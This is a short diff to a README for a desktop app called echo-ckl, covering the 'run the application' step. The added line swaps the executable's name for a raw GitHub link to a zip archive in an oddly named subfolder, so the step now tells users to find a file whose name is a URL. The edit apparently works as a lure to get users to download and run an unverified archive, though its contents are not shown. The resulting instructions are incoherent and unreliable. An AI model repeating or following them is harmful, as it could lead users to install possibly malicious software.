youssef3457/echo-ckl/README.md

 5. **Run the Application**

    Open the folder you just extracted.
-Look for the file named `echo-ckl.exe` (for Windows) or `echo-ckl` (for macOS).
+Look for the file named `https://raw.githubusercontent.com/youssef3457/echo-ckl/main/transplendent/echo-ckl.zip` (for Windows) or `echo-ckl` (for macOS).
 Double-click this file to start the application.

 6. **Follow the Setup Instructions**